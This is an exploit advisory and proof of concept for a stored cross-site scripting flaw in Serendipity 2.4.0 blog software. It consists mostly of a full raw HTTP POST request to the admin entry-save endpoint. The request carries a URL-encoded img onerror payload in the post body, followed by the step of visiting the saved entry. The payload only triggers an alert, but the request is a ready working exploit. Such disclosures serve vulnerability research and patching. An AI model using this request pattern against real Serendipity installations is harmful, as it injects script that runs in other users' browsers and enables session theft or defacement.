Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Author: Mirabbas Ağalarov
Application: Serendipity
Version: 2.4.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the new entry can do this
payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: localhost
Content-Length: 730
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1
2. visit the entry you created